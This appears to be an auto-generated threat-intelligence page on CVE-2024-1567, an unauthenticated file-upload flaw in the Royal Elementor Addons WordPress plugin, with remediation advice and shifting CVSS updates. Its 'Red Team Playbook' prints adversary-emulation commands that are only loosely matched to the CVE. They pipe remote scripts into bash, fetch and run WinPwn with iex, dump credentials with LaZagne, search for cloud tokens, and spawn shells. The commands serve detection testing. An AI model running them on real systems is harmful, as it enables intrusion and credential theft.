CVE-2024-1567
Overview
This vulnerability is a limited file upload flaw caused by inadequate file type validation in the 'file_validity' function of the Royal Elementor Addons and Templates plugin for WordPress. The affected component is the file upload module within versions up to and including 1.3.94, which fails to properly restrict dangerous file extensions. This improper validation allows unauthorized file uploads without verifying file content or extension correctness.
Vulnerability Description
The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to limited file uploads due to missing file type validation in the 'file_validity' function in all versions up to, and including, 1.3.94. This makes it possible for unauthenticated attackers to upload dangerous file types such as .svgz on the affected site's server which may make cross-site scripting or remote code execution possible.
Impact
An unauthenticated attacker can exploit this vulnerability to upload malicious files, such as SVGZ images containing embedded scripts, which can enable cross-site scripting or remote code execution on the affected server. No user interaction or authentication is required (AV:N/AC:L/PR:N/UI:N), increasing the attack surface. Successful exploitation could lead to unauthorized code execution, compromising site integrity and potentially exposing sensitive data or enabling further network penetration.
Solution
Upgrade the Royal Elementor Addons and Templates plugin to a version later than 1.3.94 where proper file type validation is implemented. Refer to the Wordfence advisory (https://www.wordfence.com/threat-intel/vulnerabilities/id/7a04705d-cd17-4b4b-b04d-de55d6479dab) for detailed patch information. Review the updated source files in versions 1.3.95 and above to confirm the presence of strict file validation logic. No official workaround is documented; prompt patching is recommended.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Royal Elementor Addons and Templates plugin for WordPress stems from inadequate validation of file types during the upload process. Specifically, the 'file_validity' function fails to properly restrict the types of files that can be uploaded, allowing unauthenticated users to upload potentially harmful file formats, such as .svgz. This oversight in file type validation opens the door for attackers to exploit the system by uploading malicious files that could lead to severe consequences, including cross-site scripting (XSS) and remote code execution (RCE). The lack of stringent checks on file uploads is a critical security flaw, especially in a widely-used content management system like WordPress, where plugins often serve as essential components for functionality and user engagement.
Attack vectors exploiting this vulnerability can be varied and sophisticated. An attacker could leverage the ability to upload a malicious file by crafting a specially designed .svgz file that contains embedded JavaScript code. Once uploaded, this file could be executed in the context of a user’s browser, leading to XSS attacks that could compromise user sessions, steal sensitive information, or manipulate site content. Furthermore, if the uploaded file is executed on the server, it could lead to RCE, allowing the attacker to gain full control over the affected server. This could enable the installation of backdoors, data exfiltration, or even the complete takeover of the website, making it a highly attractive target for malicious actors.
The real-world impact of this vulnerability can be significant, particularly for businesses relying on WordPress for their online presence. The potential for unauthorized access to sensitive data, defacement of the website, or even the distribution of malware to visitors poses a considerable risk. Organizations may face not only financial losses due to downtime and recovery efforts but also reputational damage that could erode customer trust. Additionally, if customer data is compromised, businesses could be subject to legal repercussions and regulatory fines, further amplifying the business risk associated with this vulnerability. The high CVSS score of 9.8 underscores the critical nature of this issue, indicating that immediate action is necessary to mitigate potential threats.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. First and foremost, it is essential to update the Royal Elementor Addons and Templates plugin to the latest version, where this vulnerability has been addressed. Regularly updating all plugins and themes is a fundamental practice in maintaining WordPress security. Additionally, employing a web application firewall (WAF) can help filter out malicious requests and prevent unauthorized file uploads. Monitoring server logs for unusual activity, such as unexpected file uploads or access attempts, can also aid in early detection of exploitation attempts. Furthermore, implementing strict file type validation and limiting file upload capabilities to trusted users can significantly reduce the attack surface.
In conclusion, the vulnerability within the Royal Elementor Addons and Templates plugin highlights the critical importance of robust file upload validation mechanisms in web applications. The potential for exploitation through XSS and RCE poses serious threats to both the integrity of the affected systems and the security of user data. Organizations must prioritize the implementation of effective detection and mitigation strategies to safeguard against such vulnerabilities, ensuring a secure online environment for both themselves and their users.
Recent adjustments to the CVSS score for CVE-2024-1567 reflect a refined understanding of the vulnerability’s exploitability and impact, lowering it from 9.8 to 8.2. This recalibration is based on updated qualitative assessments indicating that while the Royal Elementor Addons and Templates plugin remains susceptible to unauthorized file uploads, the conditions enabling widespread remote code execution or cross-site scripting are more constrained than initially assessed. CSURFACE threat intelligence confirms that exploit activity remains minimal, with no emerging proof-of-concept exploits or significant shifts in attacker behavior detected by our telemetry. The EPSS score’s stability further supports a scenario where exploitation risk is present but not rapidly escalating. For defenders, this nuanced risk profile underscores the importance of maintaining vigilance without overstating immediate threat severity. The lowered CVSS score suggests that while the vulnerability continues to warrant attention, it may not currently represent the highest priority compared to other active threats. This update enables security teams to better allocate resources by contextualizing the threat within a broader, dynamic risk landscape.
Update 2 — June 13, 2026
CSURFACE threat intelligence has updated the severity rating for CVE-2024-1567, reflecting a revised CVSS score increase from 8.2 to 9.8. This adjustment follows a deeper qualitative reassessment of the vulnerability’s impact, particularly emphasizing the potential for unauthenticated attackers to upload malicious files that could enable cross-site scripting or remote code execution on affected WordPress sites. Although our telemetry continues to show a stable EPSS score with no significant rise in exploitation attempts or new proof-of-concept exploits, the heightened CVSS score signals a critical risk level that demands immediate attention from defenders. This change underscores the vulnerability’s elevated potential for severe compromise, reinforcing the need for prioritized monitoring and mitigation efforts despite the current absence of a marked surge in active exploitation. Consequently, the threat level for CVE-2024-1567 should now be considered critical, aligning with its increased exploitability and impact potential as reflected in the updated scoring.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Royal-Elementor-Addons | Royal Elementor Addons | All |
cpe:2.3:a:royal-elementor-addons:royal_elementor_addons:*:*:*:*:*:wordpress:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
30%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-1567 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/7a04705d-cd17-4b4b-b04d-de55d6479dab?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/royal-elementor-addons/tags/1.3.89/classes/modules/forms/wpr-file-upload.php#L105 |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/royal-elementor-addons/tags/1.3.90/classes/modules/forms/wpr-file-upload.php |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset/3056612/royal-elementor-addons/tags/1.3.95/classes/modules/forms/wpr-file-upload.php?old=3055840&old_path=royal-elementor-addons%2Ftags%2F1.3.94%2Fclasses%2Fmodules%2Fforms%2Fwpr-file-upload.php |